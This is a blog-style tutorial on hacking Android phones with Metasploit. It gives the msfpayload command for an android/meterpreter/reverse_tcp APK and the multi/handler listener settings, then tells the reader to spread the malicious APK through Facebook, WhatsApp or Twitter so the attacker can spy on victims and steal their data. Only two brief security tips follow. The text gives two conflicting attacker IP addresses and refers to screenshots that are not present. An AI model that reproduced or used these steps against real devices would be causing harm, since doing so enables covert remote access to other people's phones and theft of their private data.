Step by step process to hack Android phone using Metasploit 2017 and how to secure?

By Admin
Advertisement
As the request  of  many readers  today I am  going  to  show  you how you can Hack Android mobile using Metasploit.So follow below given method as i provide you step by step,so first before going to the next step you need to know the following term.

1) The IP of the attacker: 192.168.8.94  (lets assume in my case.)

2) Attacker will need a port for receiving connection from other's system: 443

What  I  Your  Requirements:

1. First  you  need Metasploit framework ,(In this tutorial we are going to use Kali Linux 1.0.6 ),if you have not install kali in your system then search for this tutorial on this site.

2. Obviously you need  a  Android device (we use LG android 4.4 KitKat)

Step by Step Hacking Android Smartphone Tutorial using Metasploit: 


Step:1) First  of  all  simply  Open terminal if  you  don't  know  how  simply  press CTRL + ALT + T

Step:2) After  that you'll need to utilize the Metasploit payload framework by using below given code.

    msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>

 Here make sure that you need to enter attacker   IP address  and  here  we  considered  ip  as  182.158.18.67 (this is the static ip of attacker not dyanamic), if  you  don't  understand  please  see beelow  picture

 

Step:3)  Now goto  your console if  you  don't  know  how  to   go  to  consol window  simply   Type msfconsole.

 



Info:
 use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2

step:4) After  doing  this   The next step is you'll need to configure the switch for the Metasploit payload.




Info:

    set lhost 192.168.8.94 –> attacker IP address
    set lport 443 –> port to listen the reverse connection
     exploit –> start to listen incoming connection
Step:5)  NOw in this way attacker get a apk file or we can say malicious apk file and he need to only start distributing it via any medium for example facebook,whatsapp twitter etc.

Step:6) Now suppose i am the victim and download that malicious application and install it in my phone.And after my installation process attacker Metasploit console get something about me like this:



Step:7) The mean of above given screen is ,attacker hack your phone successfully and he will be able to get enough data from your smartphone ,It's mean attacker can do everything with your mobile he  can  spy on you ,steal your sensitive data become very easy task for him.





Security  Tips:

  • 1. Don't install APK's from the unknown source.Always prefer google play store.But sometime google also not able to determine which one is good for your smartphone or not.
  • 2.Disable unknown  source  installation from the setting.If you dont know how to block unknown sourve do mail me.